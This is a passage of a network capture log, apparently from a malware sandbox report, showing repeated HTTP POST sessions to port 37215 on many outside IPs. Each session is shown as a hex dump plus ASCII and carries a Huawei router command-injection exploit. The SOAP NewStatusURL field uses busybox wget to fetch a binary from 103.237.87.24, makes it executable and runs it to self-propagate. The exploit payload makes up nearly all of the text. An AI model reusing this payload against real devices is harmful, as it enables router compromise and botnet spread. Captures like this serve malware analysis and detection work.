2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1194192.168.2.1344246157.247.90.21337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.446429014 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1195192.168.2.135368641.197.218.21337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.446476936 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1196192.168.2.135353241.111.20.1837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.446476936 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1197192.168.2.135399841.201.98.8637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.446674109 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1198192.168.2.1358562157.2.255.13237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.446690083 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1199192.168.2.1332772157.38.138.3137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.446873903 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1200192.168.2.1335906157.78.183.14837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.446897030 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1201192.168.2.1357016172.113.45.2737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.446907997 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1202192.168.2.1360228197.94.126.20737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.446918964 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1203192.168.2.1358914197.213.236.17537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.446929932 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1204192.168.2.135834841.86.72.12737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.446950912 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
